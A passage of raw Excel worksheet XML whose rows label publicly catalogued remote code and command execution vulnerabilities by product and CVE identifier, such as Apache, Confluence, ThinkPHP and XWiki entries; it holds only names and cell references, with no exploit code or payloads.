    <row r="130" s="4" customFormat="1" spans="1:6">
      <c r="A130" s="2" t="s">
        <v>443</v>
      </c>
      <c r="B130" s="2" t="s">
        <v>435</v>
      </c>
      <c r="C130" s="2" t="s">
        <v>447</v>
      </c>
      <c r="D130" s="2" t="str">
        <f t="shared" ref="D130:D193" si="2">_xlfn.TEXTJOIN("_",TRUE,A130:C130)</f>
        <v>Apache_远程代码执行_CVE-2016-3081</v>
      </c>
      <c r="E130" s="6" t="s">
        <v>448</v>
      </c>
      <c r="F130" s="4" t="s">
        <v>449</v>
      </c>
    </row>
    <row r="131" s="4" customFormat="1" spans="1:6">
      <c r="A131" s="2" t="s">
        <v>450</v>
      </c>
      <c r="B131" s="2" t="s">
        <v>435</v>
      </c>
      <c r="C131" s="2" t="s">
        <v>451</v>
      </c>
      <c r="D131" s="2" t="str">
        <f t="shared" si="2"/>
        <v>NETGEAR Routers_远程代码执行_CVE-2016-6277</v>
      </c>
      <c r="E131" s="6" t="s">
        <v>452</v>
      </c>
      <c r="F131" s="4" t="s">
        <v>453</v>
      </c>
    </row>
    <row r="132" s="4" customFormat="1" spans="1:6">
      <c r="A132" s="2" t="s">
        <v>443</v>
      </c>
      <c r="B132" s="2" t="s">
        <v>435</v>
      </c>
      <c r="C132" s="2" t="s">
        <v>454</v>
      </c>
      <c r="D132" s="2" t="str">
        <f t="shared" si="2"/>
        <v>Apache_远程代码执行_CVE-2017-12611</v>
      </c>
      <c r="E132" s="6" t="s">
        <v>455</v>
      </c>
      <c r="F132" s="4" t="s">
        <v>456</v>
      </c>
    </row>
    <row r="133" s="4" customFormat="1" spans="1:6">
      <c r="A133" s="2" t="s">
        <v>457</v>
      </c>
      <c r="B133" s="2" t="s">
        <v>435</v>
      </c>
      <c r="C133" s="2" t="s">
        <v>458</v>
      </c>
      <c r="D133" s="2" t="str">
        <f t="shared" si="2"/>
        <v>OpenDreambox_远程代码执行_CVE-2017-14135</v>
      </c>
      <c r="E133" s="6" t="s">
        <v>459</v>
      </c>
      <c r="F133" s="4" t="s">
        <v>460</v>
      </c>
    </row>
    <row r="134" s="4" customFormat="1" spans="1:6">
      <c r="A134" s="2" t="s">
        <v>461</v>
      </c>
      <c r="B134" s="2" t="s">
        <v>435</v>
      </c>
      <c r="C134" s="2" t="s">
        <v>462</v>
      </c>
      <c r="D134" s="2" t="str">
        <f t="shared" si="2"/>
        <v>Palo Alto Network PAN_远程代码执行_CVE-2017-15944</v>
      </c>
      <c r="E134" s="6" t="s">
        <v>463</v>
      </c>
      <c r="F134" s="4" t="s">
        <v>464</v>
      </c>
    </row>
    <row r="135" s="4" customFormat="1" spans="1:6">
      <c r="A135" s="2" t="s">
        <v>443</v>
      </c>
      <c r="B135" s="2" t="s">
        <v>435</v>
      </c>
      <c r="C135" s="2" t="s">
        <v>465</v>
      </c>
      <c r="D135" s="2" t="str">
        <f t="shared" si="2"/>
        <v>Apache_远程代码执行_CVE-2018-11776</v>
      </c>
      <c r="E135" s="6" t="s">
        <v>466</v>
      </c>
      <c r="F135" s="4" t="s">
        <v>467</v>
      </c>
    </row>
    <row r="136" s="4" customFormat="1" spans="1:6">
      <c r="A136" s="2" t="s">
        <v>468</v>
      </c>
      <c r="B136" s="2" t="s">
        <v>435</v>
      </c>
      <c r="C136" s="2" t="s">
        <v>469</v>
      </c>
      <c r="D136" s="2" t="str">
        <f t="shared" si="2"/>
        <v>AudioCodes_远程代码执行_CVE-2018-10093</v>
      </c>
      <c r="E136" s="6" t="s">
        <v>470</v>
      </c>
      <c r="F136" s="4" t="s">
        <v>471</v>
      </c>
    </row>
    <row r="137" s="4" customFormat="1" spans="1:6">
      <c r="A137" s="2" t="s">
        <v>27</v>
      </c>
      <c r="B137" s="2" t="s">
        <v>435</v>
      </c>
      <c r="C137" s="2" t="s">
        <v>472</v>
      </c>
      <c r="D137" s="2" t="str">
        <f t="shared" si="2"/>
        <v>织梦_远程代码执行_CVE-2018-7700</v>
      </c>
      <c r="E137" s="6" t="s">
        <v>473</v>
      </c>
      <c r="F137" s="4" t="s">
        <v>474</v>
      </c>
    </row>
    <row r="138" s="4" customFormat="1" spans="1:6">
      <c r="A138" s="2" t="s">
        <v>475</v>
      </c>
      <c r="B138" s="2" t="s">
        <v>435</v>
      </c>
      <c r="C138" s="2" t="s">
        <v>476</v>
      </c>
      <c r="D138" s="2" t="str">
        <f t="shared" si="2"/>
        <v>FUELCMS_远程代码执行_CVE-2018-16763</v>
      </c>
      <c r="E138" s="6" t="s">
        <v>477</v>
      </c>
      <c r="F138" s="4" t="s">
        <v>478</v>
      </c>
    </row>
    <row r="139" s="4" customFormat="1" spans="1:6">
      <c r="A139" s="2" t="s">
        <v>479</v>
      </c>
      <c r="B139" s="2" t="s">
        <v>435</v>
      </c>
      <c r="C139" s="2" t="s">
        <v>480</v>
      </c>
      <c r="D139" s="2" t="str">
        <f t="shared" si="2"/>
        <v>Nuxeo_远程代码执行_CVE-2018-16341</v>
      </c>
      <c r="E139" s="6" t="s">
        <v>481</v>
      </c>
      <c r="F139" s="4" t="s">
        <v>482</v>
      </c>
    </row>
    <row r="140" s="4" customFormat="1" spans="1:6">
      <c r="A140" s="2" t="s">
        <v>104</v>
      </c>
      <c r="B140" s="2" t="s">
        <v>435</v>
      </c>
      <c r="C140" s="2" t="s">
        <v>483</v>
      </c>
      <c r="D140" s="2" t="str">
        <f t="shared" si="2"/>
        <v>PrestaShop_远程代码执行_CVE-2018-8823</v>
      </c>
      <c r="E140" s="6" t="s">
        <v>484</v>
      </c>
      <c r="F140" s="4" t="s">
        <v>485</v>
      </c>
    </row>
    <row r="141" s="4" customFormat="1" spans="1:6">
      <c r="A141" s="2" t="s">
        <v>434</v>
      </c>
      <c r="B141" s="2" t="s">
        <v>435</v>
      </c>
      <c r="C141" s="2" t="s">
        <v>486</v>
      </c>
      <c r="D141" s="2" t="str">
        <f t="shared" si="2"/>
        <v>ThinkPHP_远程代码执行_CVE-2018-20062</v>
      </c>
      <c r="E141" s="6" t="s">
        <v>487</v>
      </c>
      <c r="F141" s="4" t="s">
        <v>488</v>
      </c>
    </row>
    <row r="142" s="4" customFormat="1" spans="1:6">
      <c r="A142" s="2" t="s">
        <v>489</v>
      </c>
      <c r="B142" s="2" t="s">
        <v>435</v>
      </c>
      <c r="C142" s="2" t="s">
        <v>490</v>
      </c>
      <c r="D142" s="2" t="str">
        <f t="shared" si="2"/>
        <v>KenticoCMS_远程代码执行_CVE-2019-10068</v>
      </c>
      <c r="E142" s="6" t="s">
        <v>491</v>
      </c>
      <c r="F142" s="4" t="s">
        <v>492</v>
      </c>
    </row>
    <row r="143" s="4" customFormat="1" spans="1:6">
      <c r="A143" s="2" t="s">
        <v>443</v>
      </c>
      <c r="B143" s="2" t="s">
        <v>435</v>
      </c>
      <c r="C143" s="2" t="s">
        <v>493</v>
      </c>
      <c r="D143" s="2" t="str">
        <f t="shared" si="2"/>
        <v>Apache_远程代码执行_CVE-2020-17530</v>
      </c>
      <c r="E143" s="6" t="s">
        <v>494</v>
      </c>
      <c r="F143" s="4" t="s">
        <v>495</v>
      </c>
    </row>
    <row r="144" s="4" customFormat="1" spans="1:6">
      <c r="A144" s="2" t="s">
        <v>496</v>
      </c>
      <c r="B144" s="2" t="s">
        <v>435</v>
      </c>
      <c r="C144" s="2" t="s">
        <v>497</v>
      </c>
      <c r="D144" s="2" t="str">
        <f t="shared" si="2"/>
        <v>Gridx_远程代码执行_CVE-2020-19625</v>
      </c>
      <c r="E144" s="6" t="s">
        <v>498</v>
      </c>
      <c r="F144" s="4" t="s">
        <v>499</v>
      </c>
    </row>
    <row r="145" s="4" customFormat="1" spans="1:6">
      <c r="A145" s="2" t="s">
        <v>500</v>
      </c>
      <c r="B145" s="2" t="s">
        <v>435</v>
      </c>
      <c r="C145" s="2" t="s">
        <v>501</v>
      </c>
      <c r="D145" s="2" t="str">
        <f t="shared" si="2"/>
        <v>PHP_远程代码执行_CVE-2020-24949</v>
      </c>
      <c r="E145" s="6" t="s">
        <v>502</v>
      </c>
      <c r="F145" s="4" t="s">
        <v>503</v>
      </c>
    </row>
    <row r="146" s="4" customFormat="1" spans="1:6">
      <c r="A146" s="2" t="s">
        <v>504</v>
      </c>
      <c r="B146" s="2" t="s">
        <v>435</v>
      </c>
      <c r="C146" s="2" t="s">
        <v>505</v>
      </c>
      <c r="D146" s="2" t="str">
        <f t="shared" si="2"/>
        <v>Rails_远程代码执行_CVE-2020-8163</v>
      </c>
      <c r="E146" s="6" t="s">
        <v>506</v>
      </c>
      <c r="F146" s="4" t="s">
        <v>507</v>
      </c>
    </row>
    <row r="147" s="4" customFormat="1" spans="1:6">
      <c r="A147" s="2" t="s">
        <v>508</v>
      </c>
      <c r="B147" s="2" t="s">
        <v>435</v>
      </c>
      <c r="C147" s="2" t="s">
        <v>509</v>
      </c>
      <c r="D147" s="2" t="str">
        <f t="shared" si="2"/>
        <v>UnRaid_远程代码执行_CVE-2020-5847</v>
      </c>
      <c r="E147" s="6" t="s">
        <v>510</v>
      </c>
      <c r="F147" s="4" t="s">
        <v>511</v>
      </c>
    </row>
    <row r="148" s="4" customFormat="1" spans="1:6">
      <c r="A148" s="2" t="s">
        <v>512</v>
      </c>
      <c r="B148" s="2" t="s">
        <v>435</v>
      </c>
      <c r="C148" s="2" t="s">
        <v>513</v>
      </c>
      <c r="D148" s="2" t="str">
        <f t="shared" si="2"/>
        <v>Yii_远程代码执行_CVE-2020-15148</v>
      </c>
      <c r="E148" s="6" t="s">
        <v>514</v>
      </c>
      <c r="F148" s="4" t="s">
        <v>515</v>
      </c>
    </row>
    <row r="149" s="4" customFormat="1" spans="1:6">
      <c r="A149" s="2" t="s">
        <v>516</v>
      </c>
      <c r="B149" s="2" t="s">
        <v>435</v>
      </c>
      <c r="C149" s="2" t="s">
        <v>517</v>
      </c>
      <c r="D149" s="2" t="str">
        <f t="shared" si="2"/>
        <v>Zyxel NAS Firmware_远程代码执行_CVE-2020-9054</v>
      </c>
      <c r="E149" s="6" t="s">
        <v>518</v>
      </c>
      <c r="F149" s="4" t="s">
        <v>519</v>
      </c>
    </row>
    <row r="150" s="4" customFormat="1" spans="1:6">
      <c r="A150" s="2" t="s">
        <v>520</v>
      </c>
      <c r="B150" s="2" t="s">
        <v>435</v>
      </c>
      <c r="C150" s="2" t="s">
        <v>521</v>
      </c>
      <c r="D150" s="2" t="str">
        <f t="shared" si="2"/>
        <v>Nodejs Squirrelly_远程代码执行_CVE-2021-32819</v>
      </c>
      <c r="E150" s="6" t="s">
        <v>522</v>
      </c>
      <c r="F150" s="4" t="s">
        <v>523</v>
      </c>
    </row>
    <row r="151" s="4" customFormat="1" spans="1:6">
      <c r="A151" s="2" t="s">
        <v>524</v>
      </c>
      <c r="B151" s="2" t="s">
        <v>435</v>
      </c>
      <c r="C151" s="2" t="s">
        <v>525</v>
      </c>
      <c r="D151" s="2" t="str">
        <f t="shared" si="2"/>
        <v>Ruby Dragonfly_远程代码执行_CVE-2021-33564</v>
      </c>
      <c r="E151" s="6" t="s">
        <v>526</v>
      </c>
      <c r="F151" s="4" t="s">
        <v>527</v>
      </c>
    </row>
    <row r="152" s="4" customFormat="1" spans="1:6">
      <c r="A152" s="2" t="s">
        <v>528</v>
      </c>
      <c r="B152" s="2" t="s">
        <v>435</v>
      </c>
      <c r="C152" s="2" t="s">
        <v>529</v>
      </c>
      <c r="D152" s="2" t="str">
        <f t="shared" si="2"/>
        <v>Spring_远程代码执行_CVE-2021-22053</v>
      </c>
      <c r="E152" s="6" t="s">
        <v>530</v>
      </c>
      <c r="F152" s="4" t="s">
        <v>531</v>
      </c>
    </row>
    <row r="153" s="4" customFormat="1" spans="1:6">
      <c r="A153" s="2" t="s">
        <v>532</v>
      </c>
      <c r="B153" s="2" t="s">
        <v>435</v>
      </c>
      <c r="C153" s="2" t="s">
        <v>533</v>
      </c>
      <c r="D153" s="2" t="str">
        <f t="shared" si="2"/>
        <v>Websvn_远程代码执行_CVE-2021-32305</v>
      </c>
      <c r="E153" s="6" t="s">
        <v>534</v>
      </c>
      <c r="F153" s="4" t="s">
        <v>535</v>
      </c>
    </row>
    <row r="154" s="4" customFormat="1" spans="1:6">
      <c r="A154" s="2" t="s">
        <v>536</v>
      </c>
      <c r="B154" s="2" t="s">
        <v>435</v>
      </c>
      <c r="C154" s="2" t="s">
        <v>537</v>
      </c>
      <c r="D154" s="2" t="str">
        <f t="shared" si="2"/>
        <v>Confluence_远程代码执行_CVE-2022-26134</v>
      </c>
      <c r="E154" s="6" t="s">
        <v>538</v>
      </c>
      <c r="F154" s="4" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="155" s="4" customFormat="1" spans="1:6">
      <c r="A155" s="2" t="s">
        <v>540</v>
      </c>
      <c r="B155" s="2" t="s">
        <v>435</v>
      </c>
      <c r="C155" s="2" t="s">
        <v>541</v>
      </c>
      <c r="D155" s="2" t="str">
        <f t="shared" si="2"/>
        <v>Hitachi Pentaho Business Analytics Server_远程代码执行_CVE-2022-43769</v>
      </c>
      <c r="E155" s="6" t="s">
        <v>542</v>
      </c>
      <c r="F155" s="4" t="s">
        <v>543</v>
      </c>
    </row>
    <row r="156" s="4" customFormat="1" spans="1:6">
      <c r="A156" s="2" t="s">
        <v>77</v>
      </c>
      <c r="B156" s="2" t="s">
        <v>435</v>
      </c>
      <c r="C156" s="2" t="s">
        <v>544</v>
      </c>
      <c r="D156" s="2" t="str">
        <f t="shared" si="2"/>
        <v>WordPress_远程代码执行_CVE-2022-4060</v>
      </c>
      <c r="E156" s="6" t="s">
        <v>545</v>
      </c>
      <c r="F156" s="4" t="s">
        <v>546</v>
      </c>
    </row>
    <row r="157" s="4" customFormat="1" spans="1:6">
      <c r="A157" s="2" t="s">
        <v>77</v>
      </c>
      <c r="B157" s="2" t="s">
        <v>435</v>
      </c>
      <c r="C157" s="2" t="s">
        <v>547</v>
      </c>
      <c r="D157" s="2" t="str">
        <f t="shared" si="2"/>
        <v>WordPress_远程代码执行_CVE-2022-0346</v>
      </c>
      <c r="E157" s="6" t="s">
        <v>548</v>
      </c>
      <c r="F157" s="4" t="s">
        <v>549</v>
      </c>
    </row>
    <row r="158" s="4" customFormat="1" spans="1:6">
      <c r="A158" s="2" t="s">
        <v>550</v>
      </c>
      <c r="B158" s="2" t="s">
        <v>435</v>
      </c>
      <c r="C158" s="2" t="s">
        <v>551</v>
      </c>
      <c r="D158" s="2" t="str">
        <f t="shared" si="2"/>
        <v>Chaosblade_远程代码执行_CVE-2023-47105</v>
      </c>
      <c r="E158" s="6" t="s">
        <v>552</v>
      </c>
      <c r="F158" s="4" t="s">
        <v>553</v>
      </c>
    </row>
    <row r="159" s="4" customFormat="1" spans="1:6">
      <c r="A159" s="2" t="s">
        <v>554</v>
      </c>
      <c r="B159" s="2" t="s">
        <v>435</v>
      </c>
      <c r="C159" s="2" t="s">
        <v>555</v>
      </c>
      <c r="D159" s="2" t="str">
        <f t="shared" si="2"/>
        <v>MagnusBilling_远程代码执行_CVE-2023-30258</v>
      </c>
      <c r="E159" s="6" t="s">
        <v>556</v>
      </c>
      <c r="F159" s="4" t="s">
        <v>557</v>
      </c>
    </row>
    <row r="160" s="4" customFormat="1" spans="1:6">
      <c r="A160" s="2" t="s">
        <v>558</v>
      </c>
      <c r="B160" s="2" t="s">
        <v>435</v>
      </c>
      <c r="C160" s="2" t="s">
        <v>559</v>
      </c>
      <c r="D160" s="2" t="str">
        <f t="shared" si="2"/>
        <v>Ruckus Wireless Admin_远程代码执行_CVE-2023-25717</v>
      </c>
      <c r="E160" s="6" t="s">
        <v>560</v>
      </c>
      <c r="F160" s="4" t="s">
        <v>561</v>
      </c>
    </row>
    <row r="161" s="4" customFormat="1" spans="1:6">
      <c r="A161" s="2" t="s">
        <v>562</v>
      </c>
      <c r="B161" s="2" t="s">
        <v>435</v>
      </c>
      <c r="C161" s="2" t="s">
        <v>563</v>
      </c>
      <c r="D161" s="2" t="str">
        <f t="shared" si="2"/>
        <v>TimeKeeper_远程代码执行_CVE-2023-31465</v>
      </c>
      <c r="E161" s="6" t="s">
        <v>564</v>
      </c>
      <c r="F161" s="4" t="s">
        <v>565</v>
      </c>
    </row>
    <row r="162" s="4" customFormat="1" spans="1:6">
      <c r="A162" s="2" t="s">
        <v>566</v>
      </c>
      <c r="B162" s="2" t="s">
        <v>435</v>
      </c>
      <c r="C162" s="2" t="s">
        <v>567</v>
      </c>
      <c r="D162" s="2" t="str">
        <f t="shared" si="2"/>
        <v>XWiki_远程代码执行_CVE-2023-37462</v>
      </c>
      <c r="E162" s="6" t="s">
        <v>568</v>
      </c>
      <c r="F162" s="4" t="s">
        <v>569</v>
      </c>
    </row>
    <row r="163" s="4" customFormat="1" spans="1:6">
      <c r="A163" s="2" t="s">
        <v>570</v>
      </c>
      <c r="B163" s="2" t="s">
        <v>435</v>
      </c>
      <c r="C163" s="2" t="s">
        <v>571</v>
      </c>
      <c r="D163" s="2" t="str">
        <f t="shared" si="2"/>
        <v>FoxCMS_远程代码执行_CVE-2025-29306</v>
      </c>
      <c r="E163" s="6" t="s">
        <v>572</v>
      </c>
      <c r="F163" s="4" t="s">
        <v>573</v>
      </c>
    </row>
    <row r="164" s="4" customFormat="1" spans="1:6">
      <c r="A164" s="2" t="s">
        <v>574</v>
      </c>
      <c r="B164" s="2" t="s">
        <v>435</v>
      </c>
      <c r="C164" s="2" t="s">
        <v>575</v>
      </c>
      <c r="D164" s="2" t="str">
        <f t="shared" si="2"/>
        <v>Ivanti Endpoint Manager Mobile_远程代码执行_CVE-2025-4427</v>
      </c>
      <c r="E164" s="6" t="s">
        <v>576</v>
      </c>
      <c r="F164" s="4" t="s">
        <v>577</v>
      </c>
    </row>
    <row r="165" s="4" customFormat="1" spans="1:6">
      <c r="A165" s="2" t="s">
        <v>578</v>
      </c>
      <c r="B165" s="2" t="s">
        <v>435</v>
      </c>
      <c r="C165" s="2" t="s">
        <v>579</v>
      </c>
      <c r="D165" s="2" t="str">
        <f t="shared" si="2"/>
        <v>MeteoBridge_远程代码执行_CVE-2025-4008</v>
      </c>
      <c r="E165" s="6" t="s">
        <v>580</v>
      </c>
      <c r="F165" s="4" t="s">
        <v>581</v>
      </c>
    </row>
    <row r="166" s="4" customFormat="1" spans="1:6">
      <c r="A166" s="2" t="s">
        <v>582</v>
      </c>
      <c r="B166" s="2" t="s">
        <v>435</v>
      </c>
      <c r="C166" s="2" t="s">
        <v>583</v>
      </c>
      <c r="D166" s="2" t="str">
        <f t="shared" si="2"/>
        <v>Pterodactyl Panel_远程代码执行_CVE-2025-49132</v>
      </c>
      <c r="E166" s="6" t="s">
        <v>584</v>
      </c>
      <c r="F166" s="4" t="s">
        <v>585</v>
      </c>
    </row>
    <row r="167" s="4" customFormat="1" spans="1:6">
      <c r="A167" s="2" t="s">
        <v>586</v>
      </c>
      <c r="B167" s="2" t="s">
        <v>435</v>
      </c>
      <c r="C167" s="2" t="s">
        <v>587</v>
      </c>
      <c r="D167" s="2" t="str">
        <f t="shared" si="2"/>
        <v>SawtoothSoftware Lighthouse Studio_远程代码执行_CVE-2025-34300</v>
      </c>
      <c r="E167" s="6" t="s">
        <v>588</v>
      </c>
      <c r="F167" s="4" t="s">
        <v>589</v>
      </c>
    </row>
    <row r="168" s="4" customFormat="1" spans="1:6">
      <c r="A168" s="2" t="s">
        <v>566</v>
      </c>
      <c r="B168" s="2" t="s">
        <v>435</v>
      </c>
      <c r="C168" s="2" t="s">
        <v>590</v>
      </c>
      <c r="D168" s="2" t="str">
        <f t="shared" si="2"/>
        <v>XWiki_远程代码执行_CVE-2025-24893</v>
      </c>
      <c r="E168" s="6" t="s">
        <v>591</v>
      </c>
      <c r="F168" s="4" t="s">
        <v>592</v>
      </c>
    </row>
    <row r="169" s="4" customFormat="1" spans="1:6">
      <c r="A169" s="2" t="s">
        <v>443</v>
      </c>
      <c r="B169" s="2" t="s">
        <v>435</v>
      </c>
      <c r="C169" s="2"/>
      <c r="D169" s="2" t="str">
        <f t="shared" si="2"/>
        <v>Apache_远程代码执行</v>
      </c>
      <c r="E169" s="6" t="s">
        <v>593</v>
      </c>
      <c r="F169" s="4" t="s">
        <v>594</v>
      </c>
    </row>
    <row r="170" s="4" customFormat="1" spans="1:6">
      <c r="A170" s="2" t="s">
        <v>443</v>
      </c>
      <c r="B170" s="2" t="s">
        <v>435</v>
      </c>
      <c r="C170" s="2"/>
      <c r="D170" s="2" t="str">
        <f t="shared" si="2"/>
        <v>Apache_远程代码执行</v>
      </c>
      <c r="E170" s="6" t="s">
        <v>595</v>
      </c>
      <c r="F170" s="4" t="s">
        <v>596</v>
      </c>
    </row>
    <row r="171" s="4" customFormat="1" spans="1:6">
      <c r="A171" s="2" t="s">
        <v>597</v>
      </c>
      <c r="B171" s="2" t="s">
        <v>435</v>
      </c>
      <c r="C171" s="2"/>
      <c r="D171" s="2" t="str">
        <f t="shared" si="2"/>
        <v>Elasticsearch_远程代码执行</v>
      </c>
      <c r="E171" s="6" t="s">
        <v>598</v>
      </c>
      <c r="F171" s="4" t="s">
        <v>599</v>
      </c>
    </row>
    <row r="172" s="4" customFormat="1" spans="1:6">
      <c r="A172" s="2" t="s">
        <v>600</v>
      </c>
      <c r="B172" s="2" t="s">
        <v>435</v>
      </c>
      <c r="C172" s="2"/>
      <c r="D172" s="2" t="str">
        <f t="shared" si="2"/>
        <v>Jitsi Meet_远程代码执行</v>
      </c>
      <c r="E172" s="6" t="s">
        <v>601</v>
      </c>
      <c r="F172" s="4" t="s">
        <v>602</v>
      </c>
    </row>
    <row r="173" s="4" customFormat="1" spans="1:6">
      <c r="A173" s="2" t="s">
        <v>184</v>
      </c>
      <c r="B173" s="2" t="s">
        <v>435</v>
      </c>
      <c r="C173" s="2"/>
      <c r="D173" s="2" t="str">
        <f t="shared" si="2"/>
        <v>蓝凌_远程代码执行</v>
      </c>
      <c r="E173" s="6" t="s">
        <v>603</v>
      </c>
      <c r="F173" s="4" t="s">
        <v>604</v>
      </c>
    </row>
    <row r="174" s="4" customFormat="1" spans="1:6">
      <c r="A174" s="2" t="s">
        <v>605</v>
      </c>
      <c r="B174" s="2" t="s">
        <v>435</v>
      </c>
      <c r="C174" s="2"/>
      <c r="D174" s="2" t="str">
        <f t="shared" si="2"/>
        <v>Logstash_远程代码执行</v>
      </c>
      <c r="E174" s="6" t="s">
        <v>606</v>
      </c>
      <c r="F174" s="4" t="s">
        <v>607</v>
      </c>
    </row>
    <row r="175" s="4" customFormat="1" spans="1:6">
      <c r="A175" s="2" t="s">
        <v>608</v>
      </c>
      <c r="B175" s="2" t="s">
        <v>435</v>
      </c>
      <c r="C175" s="2"/>
      <c r="D175" s="2" t="str">
        <f t="shared" si="2"/>
        <v>Metabase_远程代码执行</v>
      </c>
      <c r="E175" s="6" t="s">
        <v>609</v>
      </c>
      <c r="F175" s="4" t="s">
        <v>610</v>
      </c>
    </row>
    <row r="176" s="4" customFormat="1" spans="1:6">
      <c r="A176" s="2" t="s">
        <v>611</v>
      </c>
      <c r="B176" s="2" t="s">
        <v>435</v>
      </c>
      <c r="C176" s="2"/>
      <c r="D176" s="2" t="str">
        <f t="shared" si="2"/>
        <v>NUUO NVRmini_远程代码执行</v>
      </c>
      <c r="E176" s="6" t="s">
        <v>612</v>
      </c>
      <c r="F176" s="4" t="s">
        <v>613</v>
      </c>
    </row>
    <row r="177" s="4" customFormat="1" spans="1:6">
      <c r="A177" s="2" t="s">
        <v>614</v>
      </c>
      <c r="B177" s="2" t="s">
        <v>435</v>
      </c>
      <c r="C177" s="2"/>
      <c r="D177" s="2" t="str">
        <f t="shared" si="2"/>
        <v>Okta_远程代码执行</v>
      </c>
      <c r="E177" s="6" t="s">
        <v>615</v>
      </c>
      <c r="F177" s="4" t="s">
        <v>616</v>
      </c>
    </row>
    <row r="178" s="4" customFormat="1" spans="1:6">
      <c r="A178" s="2" t="s">
        <v>617</v>
      </c>
      <c r="B178" s="2" t="s">
        <v>435</v>
      </c>
      <c r="C178" s="2"/>
      <c r="D178" s="2" t="str">
        <f t="shared" si="2"/>
        <v>OpenSNS_远程代码执行</v>
      </c>
      <c r="E178" s="6" t="s">
        <v>618</v>
      </c>
      <c r="F178" s="4" t="s">
        <v>619</v>
      </c>
    </row>
    <row r="179" s="4" customFormat="1" spans="1:6">
      <c r="A179" s="2" t="s">
        <v>343</v>
      </c>
      <c r="B179" s="2" t="s">
        <v>435</v>
      </c>
      <c r="C179" s="2"/>
      <c r="D179" s="2" t="str">
        <f t="shared" si="2"/>
        <v>VMware_远程代码执行</v>
      </c>
      <c r="E179" s="6" t="s">
        <v>620</v>
      </c>
      <c r="F179" s="4" t="s">
        <v>621</v>
      </c>
    </row>
    <row r="180" s="4" customFormat="1" spans="1:6">
      <c r="A180" s="2" t="s">
        <v>622</v>
      </c>
      <c r="B180" s="2" t="s">
        <v>435</v>
      </c>
      <c r="C180" s="2"/>
      <c r="D180" s="2" t="str">
        <f t="shared" si="2"/>
        <v>WIFISKY_远程代码执行</v>
      </c>
      <c r="E180" s="6" t="s">
        <v>623</v>
      </c>
      <c r="F180" s="4" t="s">
        <v>624</v>
      </c>
    </row>
    <row r="181" s="4" customFormat="1" spans="1:6">
      <c r="A181" s="2" t="s">
        <v>625</v>
      </c>
      <c r="B181" s="2" t="s">
        <v>435</v>
      </c>
      <c r="C181" s="2"/>
      <c r="D181" s="2" t="str">
        <f t="shared" si="2"/>
        <v>WebUI_远程代码执行</v>
      </c>
      <c r="E181" s="6" t="s">
        <v>626</v>
      </c>
      <c r="F181" s="4" t="s">
        <v>627</v>
      </c>
    </row>
    <row r="182" s="4" customFormat="1" spans="1:6">
      <c r="A182" s="2" t="s">
        <v>628</v>
      </c>
      <c r="B182" s="2" t="s">
        <v>435</v>
      </c>
      <c r="C182" s="2"/>
      <c r="D182" s="2" t="str">
        <f t="shared" si="2"/>
        <v>ThinkCMF_远程代码执行</v>
      </c>
      <c r="E182" s="6" t="s">
        <v>629</v>
      </c>
      <c r="F182" s="4" t="s">
        <v>630</v>
      </c>
    </row>
    <row r="183" s="4" customFormat="1" spans="1:6">
      <c r="A183" s="2" t="s">
        <v>631</v>
      </c>
      <c r="B183" s="2" t="s">
        <v>435</v>
      </c>
      <c r="C183" s="2"/>
      <c r="D183" s="2" t="str">
        <f t="shared" si="2"/>
        <v>通达OA_远程代码执行</v>
      </c>
      <c r="E183" s="6" t="s">
        <v>632</v>
      </c>
      <c r="F183" s="4" t="s">
        <v>633</v>
      </c>
    </row>
    <row r="184" s="4" customFormat="1" spans="1:6">
      <c r="A184" s="2" t="s">
        <v>634</v>
      </c>
      <c r="B184" s="2" t="s">
        <v>635</v>
      </c>
      <c r="C184" s="2" t="s">
        <v>636</v>
      </c>
      <c r="D184" s="2" t="str">
        <f t="shared" si="2"/>
        <v>Alcatel_远程命令执行_CVE-2007-3010</v>
      </c>
      <c r="E184" s="6" t="s">
        <v>637</v>
      </c>
      <c r="F184" s="4" t="s">
        <v>638</v>
      </c>
    </row>
    <row r="185" s="4" customFormat="1" spans="1:6">
      <c r="A185" s="2" t="s">
        <v>528</v>
      </c>
      <c r="B185" s="2" t="s">
        <v>635</v>
      </c>
      <c r="C185" s="2" t="s">
        <v>639</v>
      </c>
      <c r="D185" s="2" t="str">
        <f t="shared" si="2"/>
        <v>Spring_远程命令执行_CVE-2016-4977</v>
      </c>
      <c r="E185" s="6" t="s">
        <v>640</v>
      </c>
      <c r="F185" s="4" t="s">
        <v>641</v>
      </c>
    </row>
    <row r="186" s="4" customFormat="1" spans="1:6">
      <c r="A186" s="2" t="s">
        <v>611</v>
      </c>
      <c r="B186" s="2" t="s">
        <v>635</v>
      </c>
      <c r="C186" s="2" t="s">
        <v>642</v>
      </c>
      <c r="D186" s="2" t="str">
        <f t="shared" si="2"/>
        <v>NUUO NVRmini_远程命令执行_CVE-2018-14933</v>
      </c>
      <c r="E186" s="6" t="s">
        <v>643</v>
      </c>
      <c r="F186" s="4" t="s">
        <v>644</v>
      </c>
    </row>
    <row r="187" s="4" customFormat="1" spans="1:6">
      <c r="A187" s="2" t="s">
        <v>645</v>
      </c>
      <c r="B187" s="2" t="s">
        <v>635</v>
      </c>
      <c r="C187" s="2" t="s">
        <v>646</v>
      </c>
      <c r="D187" s="2" t="str">
        <f t="shared" si="2"/>
        <v>Zeroshell_远程命令执行_CVE-2019-12725</v>
      </c>
      <c r="E187" s="6" t="s">
        <v>647</v>
      </c>
      <c r="F187" s="4" t="s">
        <v>648</v>
      </c>
    </row>
    <row r="188" s="4" customFormat="1" spans="1:6">
      <c r="A188" s="2" t="s">
        <v>649</v>
      </c>
      <c r="B188" s="2" t="s">
        <v>635</v>
      </c>
      <c r="C188" s="2" t="s">
        <v>650</v>
      </c>
      <c r="D188" s="2" t="str">
        <f t="shared" si="2"/>
        <v>LinuxKI Toolset_远程命令执行_CVE-2020-7209</v>
      </c>
      <c r="E188" s="6" t="s">
        <v>651</v>
      </c>
      <c r="F188" s="4" t="s">
        <v>652</v>
      </c>
    </row>
    <row r="189" s="4" customFormat="1" spans="1:6">
      <c r="A189" s="2" t="s">
        <v>653</v>
      </c>
      <c r="B189" s="2" t="s">
        <v>635</v>
      </c>
      <c r="C189" s="2" t="s">
        <v>654</v>
      </c>
      <c r="D189" s="2" t="str">
        <f t="shared" si="2"/>
        <v>Mida eFramework_远程命令执行_CVE-2020-15920</v>
      </c>
      <c r="E189" s="6" t="s">
        <v>655</v>
      </c>
      <c r="F189" s="4" t="s">
        <v>656</v>
      </c>
    </row>
    <row r="190" s="4" customFormat="1" spans="1:6">
      <c r="A190" s="2" t="s">
        <v>657</v>
      </c>
      <c r="B190" s="2" t="s">
        <v>635</v>
      </c>
